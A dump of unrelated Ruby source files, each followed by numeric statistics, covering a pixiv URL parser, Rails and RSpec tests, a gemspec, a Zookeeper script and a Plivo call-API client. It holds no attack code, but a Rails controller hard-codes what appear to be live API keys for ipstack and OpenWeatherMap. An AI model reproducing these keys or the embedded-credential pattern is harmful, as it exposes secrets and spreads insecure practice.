    # http://i1.pixiv.net/img07/img/pasirism/18557054_p1.png
    # http://i1.pixiv.net/img07/img/pasirism/18557054_big_p1.png
    elsif url.host =~ %r!\A(?:i\d+|img\d+)\.pixiv\.net\z!i &&
        url.path =~ %r!\A(?:/img\d+)?/img/#{MONIKER}/(?<illust_id>\d+)(?:_\w+)?\.(?:jpg|jpeg|png|gif|zip)!i
      @direct_url = @url
      return $~[:illust_id].to_i
    # http://i1.pixiv.net/img-inf/img/2011/05/01/23/28/04/18557054_64x64.jpg
    # http://i1.pixiv.net/img-inf/img/2011/05/01/23/28/04/18557054_s.png
    # http://i1.pixiv.net/c/600x600/img-master/img/2014/10/02/13/51/23/46304396_p0_master1200.jpg
    # http://i1.pixiv.net/img-original/img/2014/10/02/13/51/23/46304396_p0.png
    # http://i1.pixiv.net/img-zip-ugoira/img/2014/10/03/17/29/16/46323924_ugoira1920x1080.zip
    # https://i.pximg.net/img-original/img/2014/10/03/18/10/20/46324488_p0.png
    # https://i.pximg.net/img-master/img/2014/10/03/18/10/20/46324488_p0_master1200.jpg
    #
    # but not:
    #
    # https://i.pximg.net/novel-cover-original/img/2019/01/14/01/15/05/10617324_d84daae89092d96bbe66efafec136e42.jpg
    # https://img-sketch.pixiv.net/uploads/medium/file/4463372/8906921629213362989.jpg
    elsif url.host =~ %r!\A(?:i\.pximg\.net|i\d+\.pixiv\.net)\z!i &&
        url.path =~ %r!\A(/c/\w+)?/img-[a-z-]+/img/#{DATE}/(?<illust_id>\d+)(?:_\w+)?\.(?:jpg|jpeg|png|gif|zip)!i
      @direct_url = @url
      return $~[:illust_id].to_i
    end
    return nil
  end
end
end
end
| 42.716216 | 122 | 0.591901 |
bbfca6a3398c171eb01665521b0cfd787078a02d | 1,529 | require './test/test_helper'
# Integration coverage for the micropost UI: posting (valid and invalid),
# deleting own posts, and the sidebar post counter with correct pluralisation.
class MicropostsInterfaceTest < ActionDispatch::IntegrationTest
  def setup
    @user = users(:michael)
  end
  test "micropost interface" do
    log_in_as(@user)
    get root_path
    assert_select 'div.pagination'
    assert_select 'input[type="file"]'
    # Invalid submission (empty content) must not create a record
    assert_no_difference 'Micropost.count' do
      post microposts_path, params: { micropost: { content: "" } }
    end
    assert_select 'div#error_explanation'
    # Valid submission
    content = "This micropost really ties the room together"
    assert_difference 'Micropost.count', 1 do
      post microposts_path, params: { micropost: { content: content } }
    end
    assert_redirected_to root_url
    follow_redirect!
    assert_match content, response.body
    # Delete a post
    assert_select 'a', text: 'delete'
    first_micropost = @user.microposts.paginate(page: 1).first
    assert_difference 'Micropost.count', -1 do
      delete micropost_path(first_micropost)
    end
    # Visit a different user's profile (confirm there are no delete links)
    get user_path(users(:archer))
    assert_select 'a', text: 'delete', count: 0
  end
  test "micropost sidebar count" do
    log_in_as(@user)
    get root_path
    assert_match "#{@user.microposts.count} microposts", response.body
    # A user who has not posted any microposts yet
    other_user = users(:malory)
    log_in_as(other_user)
    get root_path
    assert_match "0 microposts", response.body
    other_user.microposts.create!(content: "A micropost")
    get root_path
    # singular form when there is exactly one post
    assert_match "1 micropost", response.body
  end
end
| 29.403846 | 71 | 0.70569 |
1d0496df89e0de8c898406e8fd097b19af352ced | 450 | class Numeric
# Provide a "nice" number to use as the maximum on a chart: add 10% headroom,
# then truncate to the precision of the value's second-most-significant digit.
# e.g. 100.chart_round #=> 110, 5.chart_round #=> 5.
# Non-positive receivers fall back to 10 (so far only seen in testing).
def chart_round
  max = self * 1.1
  return 10 unless max > 0
  # Order of magnitude of `max`, shifted down one digit; may be negative for
  # values below 10, in which case 10**scale is a Rational and the
  # divide/truncate/multiply round-trip still preserves the leading digits.
  scale = Math.log10(max).to_i - 1
  ((max / 10**scale).to_i * 10**scale).to_i
end
# Zero-pads the receiver to nine digits, then delegates SSN formatting to
# String#to_ssn (defined elsewhere in the project).
# NOTE(review): `self.to_s` forces sprintf to coerce via Integer(), which
# raises for non-integral receivers (e.g. 5.5) — confirm only Integers get here.
def to_ssn
  sprintf('%09d',self.to_s).to_ssn
end
end
| 23.684211 | 71 | 0.668889 |
b985224774ba613180d3fca9b0643c9ed1154fad | 1,630 | # frozen_string_literal: true
require ::File.expand_path("../test_helper", __dir__)
module EwStripe
  # Unit tests for EwStripe::Dispute against a stubbed HTTP layer:
  # assert_requested verifies the REST verb/path, not a live API.
  class DisputeTest < Test::Unit::TestCase
    should "be listable" do
      disputes = EwStripe::Dispute.list
      assert_requested :get, "#{EwStripe.api_base}/v1/disputes"
      assert disputes.data.is_a?(Array)
      assert disputes.first.is_a?(EwStripe::Dispute)
    end
    should "be retrievable" do
      dispute = EwStripe::Dispute.retrieve("dp_123")
      assert_requested :get, "#{EwStripe.api_base}/v1/disputes/dp_123"
      assert dispute.is_a?(EwStripe::Dispute)
    end
    should "be saveable" do
      dispute = EwStripe::Dispute.retrieve("dp_123")
      dispute.metadata["key"] = "value"
      dispute.save
      assert_requested :post, "#{EwStripe.api_base}/v1/disputes/#{dispute.id}"
    end
    should "be updateable" do
      dispute = EwStripe::Dispute.update("dp_123", metadata: { key: "value" })
      assert_requested :post, "#{EwStripe.api_base}/v1/disputes/dp_123"
      assert dispute.is_a?(EwStripe::Dispute)
    end
    # instance-level close
    context "#close" do
      should "be closeable" do
        dispute = EwStripe::Dispute.retrieve("dp_123")
        dispute.close
        assert_requested :post,
          "#{EwStripe.api_base}/v1/disputes/#{dispute.id}/close"
        assert dispute.is_a?(EwStripe::Dispute)
      end
    end
    # class-level close
    context ".close" do
      should "close a dispute" do
        dispute = EwStripe::Dispute.close("dp_123")
        assert_requested :post, "#{EwStripe.api_base}/v1/disputes/dp_123/close"
        assert dispute.is_a?(EwStripe::Dispute)
      end
    end
  end
end
| 31.346154 | 79 | 0.652147 |
185ec242ce370e90e5ce6dd86d0b01ab1043b778 | 2,087 | #TODO: Move API keys to env variables instead of hard-coded strings
class ApplicationController < ActionController::Base
  # Client IP used for geo lookups; localhost is mapped to a fixed public
  # address so development still resolves to a real location.
  def get_real_ip
    # `==` instead of `===`: identical for String, and `===` is conventionally
    # reserved for case/when dispatch.
    request.remote_ip == '127.0.0.1' ? '189.6.22.151' : request.remote_ip
  end

  # Fetches the ipstack geolocation record for the current client IP and
  # returns the parsed JSON payload as a Hash.
  def get_location_info_for_ip
    user_ip_addr = get_real_ip
    # TODO: Move API access_key to env variable
    location_for_ip = RestClient.get "http://api.ipstack.com/" + user_ip_addr + "?access_key=ee44ee6ab733dbb5eec01fd1588e3430"
    JSON.parse location_for_ip
  end

  # City name for the client IP, or a fallback string when ipstack has none.
  def get_city_for_ip
    info = get_location_info_for_ip
    info['city'].present? ? info['city'] : 'City not found'
  end

  # Returns the [latitude, longitude] pair for the client IP (either may be nil).
  def get_latitude_longitude_for_ip
    info = get_location_info_for_ip
    return info['latitude'], info['longitude']
  end

  # we get climate by lat and long instead of city name or ID in order to avoid
  # duplicates errors or record not found incompatibilities between third-party APIs
  def get_weather_for_latitude_longitude
    latitude, longitude = get_latitude_longitude_for_ip
    # Guard clause; `blank?` replaces `!(x.present?) or !(y.present?)` — the
    # low-precedence `or` keyword is a classic trap in boolean conditions.
    return "Climate couldn't be determined: Lack of information" if latitude.blank? || longitude.blank?
    weather_based_on_lat_long = RestClient.get "https://api.openweathermap.org/data/2.5/weather?lat=" + latitude.to_s + "&lon=" + longitude.to_s + "&appid=7bcc10712fe906ecd190ba0bea2c910e"
    info = JSON.parse weather_based_on_lat_long
    info['weather'][0]['main'] + ", " + info['weather'][0]['description']
  end

  # TODO: take care of edge cases e.g 'São Paulo'
  def get_weather_for_city(location)
    endpoint = "https://api.openweathermap.org/data/2.5/weather?q=" + location + "&appid=7bcc10712fe906ecd190ba0bea2c910e"
    begin
      weather_based_on_city = RestClient.get endpoint
    rescue => e
      # RestClient raises on non-2xx; surface the raw response to the caller.
      return e.response
    end
    info = JSON.parse weather_based_on_city
    # checks if we got a 404 for a city that doesn't exist
    # NOTE(review): a successful OpenWeather payload also contains 'cod' (200),
    # so this branch only fires when the key is absent — confirm intent.
    return "Couldn't find city" if info['cod'].blank?
    info['weather'][0]['main'] + ", " + info['weather'][0]['description']
  end
end
| 33.126984 | 187 | 0.736943 |
1c0deb202ad2025deb4c8bd6565a7781da0e1f79 | 633 | require File.expand_path('../../../spec_helper', __FILE__)
require 'strscan'
# StringScanner#post_match is the text after the last successful match;
# getch/get_byte advance the scan position one character/byte at a time.
describe "StringScanner#post_match" do
  before :each do
    @s = StringScanner.new("This is a test")
  end
  it "returns the post-match (in the regular expression sense) of the last scan" do
    @s.post_match.should == nil
    @s.scan(/\w+\s/)
    @s.post_match.should == "is a test"
    @s.getch
    @s.post_match.should == "s a test"
    @s.get_byte
    @s.post_match.should == " a test"
    @s.get_byte
    @s.post_match.should == "a test"
  end
  it "returns nil if there's no match" do
    # "This..." starts with a word character, so /\s+/ fails to match
    @s.scan(/\s+/)
    @s.post_match.should == nil
  end
end
| 24.346154 | 83 | 0.631912 |
b9b6f1e908a31eda198156589f83920b1f1a8851 | 715 | # == Schema Information
#
# Table name: partners
#
# id :integer not null, primary key
# name :string
# email :string
# created_at :datetime not null
# updated_at :datetime not null
# organization_id :integer
# send_reminders :boolean default(FALSE), not null
# status :integer default("uninvited")
#
FactoryBot.define do
  factory :partner do
    sequence(:name) { |n| "Leslie Sue, the #{n}" }
    sequence(:email) { |n| "leslie#{n}@gmail.com" }
    send_reminders { true }
    # Reuse the first organization when one exists to keep specs fast.
    organization { Organization.try(:first) || create(:organization) }
  end
  # NOTE(review): this trait sits at define-level (a global trait) rather than
  # inside :partner — confirm that is intentional.
  trait :approved do
    status { :approved }
  end
end
| 26.481481 | 70 | 0.583217 |
bbb7f3232fd395f615c63c7a82c065c174a8423e | 126 | node.set['platform'] = 'ubuntu'
# @see https://github.com/opscode-cookbooks/jenkins
include_recipe 'jenkins::_master_package' | 31.5 | 51 | 0.769841 |
61f8ba67e9cc5137788004b7826d280f198fd3cd | 1,883 | # -*- encoding: utf-8 -*-
$LOAD_PATH.push File.expand_path('../lib', __FILE__)
require_relative 'lib/MrMurano/version.rb'
Gem::Specification.new do |s|
  s.name = 'MuranoCLI'
  s.version = MrMurano::VERSION
  s.authors = ['Michael Conrad Tadpol Tilstra']
  s.email = ['[email protected]']
  s.license = 'MIT'
  s.homepage = 'https://github.com/exosite/MuranoCLI'
  s.summary = 'Do more from the command line with Murano'
  s.description = %{Do more from the command line with Murano
Push and pull data from Murano.
Get status on what things have changed.
See a diff of the changes before you push.
and so much more.
This gem was formerly known as MrMurano.
}
  s.required_ruby_version = '~> 2.0'
  # File lists come straight from git, so building the gem requires a checkout.
  s.files = `git ls-files`.split("\n")
  s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
  s.executables = `git ls-files -- bin/*`.split("\n").map { |f| File.basename(f) }
  s.require_paths = ['lib']
  s.add_runtime_dependency('commander', '~> 4.4.3')
  s.add_runtime_dependency('certified', '1.0.0')
  s.add_runtime_dependency('dotenv', '~> 2.1.1')
  s.add_runtime_dependency('highline', '~> 1.7.8')
  s.add_runtime_dependency('http-form_data', '1.0.2')
  s.add_runtime_dependency('inifile', '~> 3.0')
  s.add_runtime_dependency('json-schema', '~> 2.7.0')
  s.add_runtime_dependency('mime-types', '~> 3.1')
  s.add_runtime_dependency('mime-types-data', '~> 3.2016.0521')
  s.add_runtime_dependency('terminal-table', '~> 1.7.3')
  s.add_development_dependency('bundler', '~> 1.7.6')
  s.add_development_dependency('ocra', '~> 1.3.8')
  s.add_development_dependency('rake', '~> 10.1.1')
  s.add_development_dependency('rspec', '~> 3.5')
  s.add_development_dependency('simplecov')
  s.add_development_dependency('webmock', '~> 2.1.0')
  # maybe? s.add_development_dependency('vcr', '~> ???')
end
| 36.921569 | 84 | 0.662241 |
797b304799a56e7a78c66a6f6d5d9357a1f27d26 | 1,061 | #
# Cookbook:: chrony
# Spec:: default
#
# Copyright:: 2018-2019, The Authors, All Rights Reserved.
require 'spec_helper'
# ChefSpec convergence smoke tests: the default recipe must converge without
# error on both an apt-based and a yum-based platform.
describe 'chrony::default' do
  context 'When all attributes are default, on Ubuntu 16.04' do
    let(:chef_run) do
      # for a complete list of available platforms and versions see:
      # https://github.com/customink/fauxhai/blob/master/PLATFORMS.md
      runner = ChefSpec::ServerRunner.new(platform: 'ubuntu', version: '16.04')
      runner.converge(described_recipe)
    end
    it 'converges successfully' do
      expect { chef_run }.to_not raise_error
    end
  end
  context 'When all attributes are default, on CentOS 7.4.1708' do
    let(:chef_run) do
      # for a complete list of available platforms and versions see:
      # https://github.com/customink/fauxhai/blob/master/PLATFORMS.md
      runner = ChefSpec::ServerRunner.new(platform: 'centos', version: '7.4.1708')
      runner.converge(described_recipe)
    end
    it 'converges successfully' do
      expect { chef_run }.to_not raise_error
    end
  end
end
| 29.472222 | 82 | 0.696513 |
08120d6727d2c32371a8f07df0cf1581b47468fb | 32 | # View-helper namespace for DefaultStreams; presumably Rails-generated and
# intentionally empty so far — TODO confirm before removing.
module DefaultStreamsHelper
end
| 10.666667 | 27 | 0.90625 |
ab1ca5d349a2f23de89339e12d18a981740d970b | 10,374 | # Copyright (c) 2007-2012 Vassilis Rizopoulos. All rights reserved.
# Copyright (c) 2021 Markus Prasser. All rights reserved.
require 'observer'
module Batir
#CommandSequence describes a set of commands to be executed in sequence.
#
#Each instance of CommandSequence contains a set of Batir::Command instances, which are the steps to perform.
#
#The steps are executed in the sequence they are added. A CommandSequence can terminate immediately on step failure or it can continue. It will still be marked as failed as long as a single step fails.
#
#Access to the CommandSequence status is achieved using the Observer pattern.
#
#The :sequence_status message contains the status of the sequence, an instance of the class CommandSequenceStatus.
#
#CommandSequence is designed to be reusable, so it does not correspond to a single sequence run, rather it corresponds to
#the currently active run. Calling reset, or run will discard the old state and create a new sequence 'instance' and status.
#
#No threads are spawned by CommandSequence (that doesn't mean the commands cannot, but it is not advisable).
  class CommandSequence
    include Observable
    # name: sequence label; state: CommandSequenceStatus of the active run;
    # steps: the Command-like instances executed in order.
    attr_reader :name,:state,:steps
    attr_reader :sequence_runner
    attr_reader :sequence_id
    def initialize name,sequence_runner=""
      @name=name
      @steps||=Array.new
      @sequence_runner=sequence_runner
      #initialize the status for the currently active build (not executed)
      reset
    end
    #sets the sequence runner attribute updating status
    def sequence_runner=name
      @sequence_runner=name
      @state.sequence_runner=name
    end
    #sets the sequence id attribute updating status
    def sequence_id=name
      @sequence_id=name
      @state.sequence_id=name
    end
    #Executes the CommandSequence.
    #
    #Will run all step instances in sequence observing the exit strategies on warning/failures
    def run context=nil
      #set the start time
      @state.start_time=Time.now
      #reset the stop time
      @state.stop_time=nil
      #we started running, lets tell the world
      @state.status=:running
      notify(:sequence_status=>@state)
      #we are optimistic
      running_status=:success
      #but not that much
      running_status=:warning if @steps.empty?
      #execute the steps in sequence
      @steps.each do |step|
        #the step is running, tell the world
        @state.step=step
        step.status=:running
        notify(:sequence_status=>@state)
        #run it, get the result and notify
        result=step.run(context)
        # NOTE(review): the status is forced back to :running here even though
        # the step has just finished; it looks like it should reflect `result`.
        # Confirm before changing — observers may rely on this extra event.
        @state.step=step
        step.status=:running
        notify(:sequence_status=>@state)
        #evaluate the results' effect on execution status at the end
        case result
        when :success
          #everything is fine, continue
        when :error
          #this will be the final status
          running_status=:error
          #stop if we fail on error
          if :fail_on_error==step.strategy
            @state.status=:error
            break
          end
        when :warning
          #a previous failure overrides a warning
          running_status=:warning unless :error==running_status
          #escalate this to a failure if the strategy says so
          running_status=:error if :flunk_on_warning==step.strategy
          #stop if we fail on warning
          if :fail_on_warning==step.strategy
            @state.status=:error
            break
          end
        end
      end#each step
      #we finished
      @state.stop_time=Time.now
      @state.status=running_status
      notify(:sequence_status=>@state)
    end
    #Adds a step to the CommandSequence using the given exit strategy.
    #
    #Steps are always added at the end of the build sequence. A step should quack like a Batir::Command.
    #
    #Valid exit strategies are
    # :fail_on_error - CommandSequence terminates on failure of this step
    # :flunk_on_error - CommandSequence is flagged as failed but continues to the next step
    # :fail_on_warning - CommandSequence terminates on warnings in this step
    # :flunk_on_warning - CommandSequence is flagged as failed on warning in this step
    def add_step step,exit_strategy=:fail_on_error
      #duplicate the command so the caller's instance is never mutated
      bstep=step.dup
      #reset it
      bstep.reset
      #set the extended attributes
      [email protected]
      #unknown strategies silently fall back to the default :fail_on_error
      exit_strategy = :fail_on_error unless [:flunk_on_error,:fail_on_warning,:flunk_on_warning].include?(exit_strategy)
      bstep.strategy=exit_strategy
      #add it to the lot
      @steps << bstep
      #add it to status as well
      @state.step=bstep
      notify(:sequence_status=>@state)
      return bstep
    end
    #Resets the status. This will set :not_executed status,
    #and set the start and end times to nil.
    def reset
      #reset all the steps (stati and execution times)
      @steps.each{|step| step.reset}
      #reset the status
      @state=CommandSequenceStatus.new(@name)
      @steps.each{|step| @state.step=step}
      @state.start_time=Time.now
      @state.stop_time=nil
      @state.sequence_runner=@sequence_runner
      #tell the world
      notify(:sequence_status=>@state)
    end
    #Returns true if the sequence has finished executing
    def completed?
      return @state.completed?
    end
    def to_s
      "#{sequence_id}:#{@name} on #{@sequence_runner}, #{@steps.size} steps"
    end
    private
    #observer notification: marks the Observable as changed, then pushes params
    def notify *params
      changed
      notify_observers(*params)
    end
  end
#CommandSequenceStatus represents the status of a CommandSequence, including the status of all the steps for this sequence.
#
#In order to extract the status from steps, classes should quack to the rythm of Command. CommandSequenceStatus does this, so you can nest Stati
#
#The status of an action sequence is :not_executed, :running, :success, :warning or :error and represents the overall status
# :not_executed is set when all steps are :not_executed
# :running is set while the sequence is running.
#Upon completion or interruption one of :success, :error or :warning will be set.
# :success is set when all steps are succesfull.
# :warning is set when at least one step generates warnings and there are no failures.
# :error is set when after execution at least one step has the :error status
class CommandSequenceStatus
attr_accessor :start_time,:stop_time,:sequence_runner,:sequence_name,:status,:step_states,:sequence_id,:strategy
#You can pass an array of Commands to initialize CommandSequenceStatus
def initialize sequence_name,steps=nil
@sequence_name=sequence_name
@sequence_runner=""
@sequence_id=nil
@step_states||=Hash.new
#not run yet
@status=:not_executed
#translate the array of steps as we need it in number=>state form
steps.each{|step| self.step=step } if steps
@start_time=Time.now
end
def running?
return true if :running==@status
return false
end
#true is returned when all steps were succesfull.
def success?
return true if :success==@status
return false
end
#A sequence is considered completed when:
#
#a step has errors and the :fail_on_error strategy is used
#
#a step has warnings and the :fail_on_warning strategy is used
#
#in all other cases if none of the steps has a :not_executed or :running status
def completed?
#this saves us iterating once+1 when no execution took place
return false if !self.executed?
@step_states.each do |state|
return true if state[1][:status]==:error && state[1][:strategy]==:fail_on_error
return true if state[1][:status]==:warning && state[1][:strategy]==:fail_on_warning
end
@step_states.each{|state| return false if state[1][:status]==:not_executed || state[1][:status]==:running }
return true
end
#A nil means there is no step with that number
def step_state number
s=@step_states[number] if @step_states[number]
return s
end
#Adds a step to the state. The step state is inferred from the Command instance __step__
def step=step
@step_states[step.number]={:name=>step.name,
:status=>step.status,
:output=>step.output,
:duration=>step.exec_time,
:error=>step.error,
:strategy=>step.strategy
}
#this way we don't have to compare all the step states we always get the worst last stable state
#:not_executed<:success<:warning<:success
unless @status==:running
@previous_status=@status
case step.status
when :running
@status=:running
when :warning
@status=:warning unless @status==:error
@status=:error if @previous_status==:error
when :error
@status=:error
when :success
@status=:success unless @status==:error || @status==:warning
@status=:warning if @previous_status==:warning
@status=:error if @previous_status==:error
when :not_executed
@status=@previous_status
end
end#unless running
end
#produces a brief text summary for this status
def summary
sum=""
sum<<"#{@sequence_id}:" if @sequence_id
sum<<"#{@sequence_name}. " unless @sequence_name.empty?
sum<<"Status - #{@status}"
if !@step_states.empty? && @status!=:not_executed
sum<<". States #{@step_states.size}\nStep status summary:"
sorter=Hash.new
@step_states.each do |number,state|
#sort them by number
sorter[number]="\n\t#{number}:'#{state[:name]}' - #{state[:status]}"
end
1.upto(sorter.size) {|i| sum << sorter[i] if sorter[i]}
end
return sum
end
def to_s
"'#{sequence_id}':'#{@sequence_name}' on '#{@sequence_runner}' started at #{@start_time}.#{@step_states.size} steps"
end
# Elapsed wall-clock time of the run; 0 until a stop time is recorded.
def exec_time
  @stop_time ? @stop_time - @start_time : 0
end
# Step-compatible accessors, so a sequence state can stand in for a step.
def name
  @sequence_name
end

def number
  @sequence_id
end

def output
  summary
end

def error
  ""
end
# True once the sequence has moved past its initial :not_executed status.
def executed?
  @status != :not_executed
end
end
end
| 36.146341 | 203 | 0.667727 |
08aadceb20b4640da5c231df0bb99a32168609ad | 1,239 | require 'spec_helper'
RSpec.describe 'default browser context' do
  # Ported from the upstream Playwright suite:
  # https://github.com/microsoft/playwright/blob/master/tests/defaultbrowsercontext-2.spec.ts
  it 'should accept userDataDir' do
    Dir.mktmpdir do |tmpdir|
      # Launching a persistent context should populate the userDataDir
      # with profile files while the browser is running...
      browser_type.launch_persistent_context(tmpdir) do |context|
        # NOTE(review): the glob pattern '*/**' only matches entries nested at
        # least one directory deep - confirm '**/*' was not intended here.
        expect(Dir.glob(File.join(tmpdir, '*/**'))).not_to be_empty
      end
      # ...and those files must survive closing the context.
      expect(Dir.glob(File.join(tmpdir, '*/**'))).not_to be_empty
    end
  end
  it 'should restore state from userDataDir', sinatra: true do
    Dir.mktmpdir do |tmpdir|
      # First session writes a localStorage value...
      browser_type.launch_persistent_context(tmpdir) do |context|
        page = context.new_page
        page.goto(server_empty_page)
        page.evaluate("() => localStorage.hey = 'hello'")
      end
      # ...a second session over the same userDataDir must see it again.
      browser_type.launch_persistent_context(tmpdir) do |context|
        page = context.new_page
        page.goto(server_empty_page)
        expect(page.evaluate("() => localStorage.hey")).to eq('hello')
      end
    end
    # A fresh userDataDir must not leak state from the previous one.
    Dir.mktmpdir do |tmpdir|
      browser_type.launch_persistent_context(tmpdir) do |context|
        page = context.new_page
        page.goto(server_empty_page)
        expect(page.evaluate("() => localStorage.hey")).not_to eq('hello')
      end
    end
  end
end
| 32.605263 | 93 | 0.673123 |
ed3d4c403d813b24e5ba804a57ce23ea0bbaa282 | 628 | # Copyright 2016 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Stackdriver
  # Current release version of this gem.
  VERSION = "0.14.0".freeze
end
| 33.052632 | 74 | 0.757962 |
3829ec16c3dd64871c28e7ff543d443bfed827c7 | 269 | class CreateRestaurants < ActiveRecord::Migration[4.2]
def change
create_table :restaurants do |t|
t.string :name
t.string :image_url
t.string :categories
t.integer :rating
t.string :address
t.string :yelp_id
end
end
end
| 20.692308 | 54 | 0.650558 |
d5a425314e29ff1cbeb5c5db0f195fdf188e21c3 | 1,368 | require 'rubygems'
require 'zookeeper'
# Polls the given block every 100ms until it returns truthy or the
# timeout (in seconds) elapses. Returns nil in both cases.
def wait_until(timeout = 10, &block)
  deadline = Time.now + timeout
  loop do
    break if block.call
    break if Time.now > deadline
    sleep 0.1
  end
end
# Connect to a local ZooKeeper server; the rest of the script is an
# end-to-end watch test and cannot proceed without a live connection.
puts 'Initializing Zookeeper'
zk = Zookeeper.new('localhost:2181')
if zk.state != Zookeeper::ZOO_CONNECTED_STATE
  puts 'Unable to connect to Zookeeper!'
  Kernel.exit
end
# Zookeeper watch callback body: dumps the event and reports whether the
# event path matches the context registered with the watch.
def watcher(args)
  puts args.inspect
  puts "In watcher: path=#{args.path}, context=#{args.context}"
  verdict = args.path == args.context ? "TEST PASSED IN WATCHER" : "TEST FAILED IN WATCHER"
  puts verdict
end
# Watch callback; its block reports whether the received event is for the
# path we registered (wcb is handed its own handle as context below).
wcb = Zookeeper::WatcherCallback.new do
  watcher(wcb)
end
# Create a sequenced base node to work under.
resp = zk.create(:path => '/test', :sequence => true)
puts "#{resp.inspect}"
puts "TEST FAILED [create]" unless resp[:rc] == Zookeeper::ZOK
base_path = resp[:path]
watched_file = "#{base_path}/file.does.not.exist"
# Stat a non-existent child with a watch attached; this must report
# ZNONODE but still register the watch for the node's creation.
resp = zk.stat(:path => watched_file, :watcher => wcb, :watcher_context => watched_file)
puts "#{resp.inspect}"
puts "TEST FAILED [stat]" unless resp[:rc] == Zookeeper::ZNONODE
# Creating the node now should fire the watch registered above.
resp = zk.create(:path => watched_file, :data => 'test data', :ephemeral => true)
puts "#{resp.inspect}"
puts "TEST FAILED [create]" unless resp[:rc] == Zookeeper::ZOK
# Give the watch up to the default timeout to fire.
wait_until { wcb.completed? }
puts "TEST FAILED" unless wcb.completed?
puts "TEST PASSED"
# Clean up the nodes we created.
zk.delete(:path => watched_file)
zk.delete(:path => base_path)
| 24 | 88 | 0.698099 |
116d5e0335c47efc3bb41055201fae72cef4a930 | 29,758 | module Plivo
module Resources
include Plivo::Utils
class Call < Base::Resource
# Binds this resource to the /Call/{call_uuid}/ endpoint.
def initialize(client, options = nil)
  @_name = 'Call'
  @_identifier_string = 'call_uuid'
  super
end
# Transfers one or both legs of this live call to new XML URLs.
# @param [Hash] options
#   :legs - 'aleg', 'bleg' or 'both'; when omitted, aleg is assumed.
#   :aleg_url / :bleg_url - transfer URLs, required according to :legs.
#   :aleg_method / :bleg_method - 'GET' or 'POST'.
# NOTE(review): the URL-requirement branches compare options[:legs] against
# String literals only; a Symbol value (e.g. :aleg) passes the valid_param?
# check above yet skips every URL check - confirm whether Symbol legs
# should be normalised to Strings.
def update(options)
  valid_param?(:options, options, Hash, true)
  params = {}
  # Validate and forward the legs selector when supplied.
  if options.key?(:legs) &&
     valid_param?(:legs, options[:legs],
                  [String, Symbol], true, %w[aleg bleg both])
    params[:legs] = options[:legs]
  end
  # No :legs given - the default leg is aleg, so aleg_url is mandatory.
  unless options.key?(:legs)
    unless options.key?(:aleg_url)
      raise_invalid_request('default leg is aleg, aleg_url has to be specified')
    end
    params[:aleg_url] = options[:aleg_url]
  end
  if options[:legs] == 'aleg'
    unless options.key?(:aleg_url)
      raise_invalid_request('leg is aleg, aleg_url has to be specified')
    end
    params[:aleg_url] = options[:aleg_url]
  end
  if options[:legs] == 'bleg'
    unless options.key?(:bleg_url)
      raise_invalid_request('leg is bleg, bleg_url has to be specified')
    end
    params[:bleg_url] = options[:bleg_url]
  end
  if options[:legs] == 'both'
    unless options.key?(:aleg_url) && options.key?(:bleg_url)
      raise_invalid_request('leg is both, aleg_url & bleg_url have to be specified')
    end
    params[:aleg_url] = options[:aleg_url]
    params[:bleg_url] = options[:bleg_url]
  end
  # Optional HTTP methods used to invoke the transfer URLs.
  %i[aleg_method bleg_method].each do |param|
    if options.key?(param) &&
       valid_param?(param, options[param], [String, Symbol], true, %w[GET POST])
      params[param] = options[param]
    end
  end
  perform_update(params)
end
# Deletes this call resource.
def delete
  perform_delete
end
# Starts recording this call. With no options a default recording is
# started; otherwise only the validated options below are forwarded:
# :transcription_url/:callback_url, :transcription_method/:callback_method
# ('GET'/'POST'), :time_limit (seconds), :file_format ('wav'/'mp3'),
# :transcription_type ('auto'/'hybrid').
def record(options = nil)
  return perform_action('Record', 'POST', nil, true) if options.nil?
  valid_param?(:options, options, Hash, true)
  params = {}
  %i[transcription_url callback_url].each do |param|
    if options.key?(param) &&
       valid_param?(param, options[param], [String, Symbol], true)
      params[param] = options[param]
    end
  end
  %i[transcription_method callback_method].each do |param|
    if options.key?(param) &&
       valid_param?(param, options[param], [String, Symbol], true, %w[GET POST])
      params[param] = options[param]
    end
  end
  if options.key?(:time_limit) &&
     valid_param?(:time_limit, options[:time_limit], Integer, true)
    params[:time_limit] = options[:time_limit]
  end
  if options.key?(:file_format) &&
     valid_param?(:file_format, options[:file_format],
                  [String, Symbol], true, %w[wav mp3])
    params[:file_format] = options[:file_format]
  end
  if options.key?(:transcription_type) &&
     valid_param?(:transcription_type, options[:transcription_type],
                  [String, Symbol], true, %w[auto hybrid])
    params[:transcription_type] = options[:transcription_type]
  end
  perform_action('Record', 'POST', params, true)
end
# Stops recording this call. When a recording URL is given, only that
# recording is stopped; otherwise all recordings are stopped.
def stop_record(url = nil)
  return perform_action('Record', 'DELETE') if url.nil?
  valid_param?(:URL, url, [String, Symbol], true)
  perform_action('Record', 'DELETE', { URL: url }, false)
end
# Plays audio file(s) on this call; the URLs are joined with commas for
# the API. options: :length (seconds), :legs ('aleg'/'bleg'/'both'),
# :loop and :mix (booleans).
def play(urls, options = nil)
  valid_param?(:urls, urls, Array, true)
  if options.nil?
    return perform_action('Play', 'POST', { urls: urls.join(',') }, true)
  end
  valid_param?(:options, options, Hash, true)
  params = { urls: urls.join(',') }
  if options.key?(:length) &&
     valid_param?(:length, options[:length], Integer, true)
    params[:length] = options[:length]
  end
  if options.key?(:legs) &&
     valid_param?(:legs, options[:legs],
                  [String, Symbol], true, %w[aleg bleg both])
    params[:legs] = options[:legs]
  end
  %i[loop mix].each do |param|
    if options.key?(param) &&
       valid_param?(param, options[param], [TrueClass, FalseClass], true)
      params[param] = options[param]
    end
  end
  perform_action('Play', 'POST', params, true)
end
# Stops any audio currently being played on this call.
def stop_play
  perform_action('Play', 'DELETE', nil, false)
end
# Speaks text on this call via text-to-speech.
# options: :language, :voice ('MAN'/'WOMAN'), :legs ('aleg'/'bleg'/'both'),
# :loop and :mix (booleans).
def speak(text, options = nil)
  valid_param?(:text, text, String, true)
  if options.nil?
    return perform_action('Speak', 'POST', { text: text }, true)
  end
  valid_param?(:options, options, Hash, true)
  params = { text: text }
  if options.key?(:language) &&
     valid_param?(:language, options[:language], String, true)
    params[:language] = options[:language]
  end
  if options.key?(:voice) &&
     valid_param?(:voice, options[:voice],
